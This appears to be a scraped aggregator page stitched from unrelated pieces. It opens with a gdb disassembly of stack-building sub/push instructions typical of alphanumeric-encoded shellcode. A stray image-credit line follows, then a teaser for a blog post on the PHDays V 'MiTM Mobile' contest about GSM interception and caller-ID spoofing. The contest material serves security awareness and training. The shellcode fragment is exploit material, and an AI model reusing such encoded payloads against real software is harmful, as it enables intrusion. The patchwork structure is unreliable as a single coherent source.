   0xffffd6d7:  sub    eax,0x69464130
   0xffffd6dc:  push   eax
   0xffffd6dd:  sub    eax,0x4f4f4f4f
   0xffffd6e2:  sub    eax,0x4f774f6a
   0xffffd6e7:  sub    eax,0x61726169
   0xffffd6ec:  push   eax
   0xffffd6ed:  sub    eax,0x4e254e4e
   0xffffd6f2:  sub    eax,0x61252561
   0xffffd6f7:  sub    eax,0x74343471
   0xffffd6fc:  push   eax
   0xffffd6fd:  sub    eax,0x30535325
   0xffffd702:  sub    eax,0x354c5325
   0xffffd707:  sub    eax,0x25437537
   0xffffd70c:  push   eax
   0xffffd70d:  sub    eax,0x46466b46
   0xffffd712:  sub    eax,0x68557039
   0xffffd717:  push   eax
   0xffffd718:  sub    eax,0x58585858
   0xffffd71d:  sub    eax,0x58585858
   0xffffd722:  sub    eax,0x464f5850
   0xffffd727:  push   eax
   0xffffd728:  sub    eax,0x6a414141
   0xffffd72d:  sub    eax,0x6a327730
   0xffffd732:  sub    eax,0x762d7730
   0xffffd737:  push   eax
   0xffffd738:  push   eax
   0xffffd739:  push   eax
   0xffffd73a:  push   eax
   0xffffd73b:  push   eax
   0xffffd73c:  push   eax
   0xffffd73d:  push   eax
   0xffffd73e:  push   eax
   0xffffd73f:  push   eax
(gdb)


Source Image: prostheticknowledge.com

The MiTM Mobile Contest: GSM Network Down at PHDays V

July 6, 2015, 5:10 am
$
0
0
Although we have published several research works on cell phone tapping, SMS interception, subscriber tracking, and SIM card cracking, lots of our readers still regard those stories as some kind of magic used only by intelligence agencies. The MiTM Mobile contest was held at PHDays for the first time, and it let the participants realize how easily an attacker can conduct the above-mentioned attacks having only a 10$ cell phone with some hacker freeware.

Contest conditions and technologies

You've got a corporate cell phone of a MiTM Mobile network user.
Through the DarkNet you have obtained some information that can be useful:
1) The codes for publes (PHDays game currency – Pseudo rUBLE) are regularly sent to the phone number of the corporation's chief accountant — 10000.
2) The financial director is missing, nobody can get him on the phone for several days, his cell phone is turned off, but he is still getting passwords.
3) You can obtain key information by calling the number 2000, but there is authorization by the caller's number. We also managed to find out the phone number of the director's private secretary — 77777. He must have the access.

more here...................http://blog.ptsecurity.com/2015/07/the-mitm-mobile-contest-gsm-network.html




Viewing all 8064 articles
Browse latest View live
Search